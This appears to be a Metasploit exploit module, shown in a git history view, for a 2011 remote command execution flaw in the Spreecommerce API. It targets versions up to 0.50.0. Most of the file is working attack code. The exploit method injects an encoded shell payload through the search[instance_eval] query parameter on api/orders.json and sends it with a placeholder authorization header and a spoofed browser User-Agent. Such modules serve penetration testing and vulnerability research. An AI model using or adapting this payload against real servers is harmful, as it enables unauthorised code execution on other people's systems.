metasploit-framework/modules/exploits/multi/http/spree_searchlogic_exec.rb

76 lines
2.2 KiB
Ruby
Raw Normal View History

##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
2013-08-30 21:28:54 +00:00
Rank = ExcellentRanking
2013-08-30 21:28:54 +00:00
include Msf::Exploit::Remote::HttpClient
2013-08-30 21:28:54 +00:00
def initialize(info = {})
super(update_info(info,
'Name' => 'Spreecommerce Arbitrary Command Execution',
2013-08-30 21:28:54 +00:00
'Description' => %q{
This module exploits an arbitrary command execution vulnerability in
the Spreecommerce API searchlogic for versions 0.50.0 and earlier.
Unvalidated input is called via the Ruby send method allowing command
execution.
2013-08-30 21:28:54 +00:00
},
'Author' => [ 'joernchen <joernchen[at]phenoelit.de>' ], #Phenoelit
'License' => MSF_LICENSE,
'References' =>
[
[ 'OSVDB', '71900'],
[ 'URL', 'http://www.spreecommerce.com/blog/2011/04/19/security-fixes/' ],
2013-08-30 21:28:54 +00:00
],
'Privileged' => false,
'Payload' =>
{
'BadChars' => "\x60",
'DisableNops' => true,
'Space' => 31337,
'Compat' =>
{
'PayloadType' => 'cmd',
}
},
'Platform' => %w{ linux unix },
2013-08-30 21:28:54 +00:00
'Arch' => ARCH_CMD,
'Targets' => [[ 'Automatic', { }]],
'DisclosureDate' => 'Apr 19 2011',
'DefaultTarget' => 0))
2013-08-30 21:28:54 +00:00
register_options(
[
OptString.new('URI', [true, "The path to the Spreecommerce main site", "/"]),
], self.class)
end
2013-08-30 21:28:54 +00:00
def exploit
command = Rex::Text.uri_encode(payload.raw, 'hex-noslashes')
2013-08-30 21:28:54 +00:00
urlconfigdir = normalize_uri(datastore['URI']) + '/' + "api/orders.json?search[instance_eval]=Kernel.fork%20do%60#{command}%60end"
res = send_request_raw({
'uri' => urlconfigdir,
'method' => 'GET',
'headers' =>
{
'HTTP_AUTHORIZATION' => 'ABCD', #needs to be present
'User-Agent' => 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',
'Connection' => 'Close',
}
}, 0.4 ) #short timeout, we don't care about the response
if (res)
print_status("The server returned: #{res.code} #{res.message}")
end
handler
end
end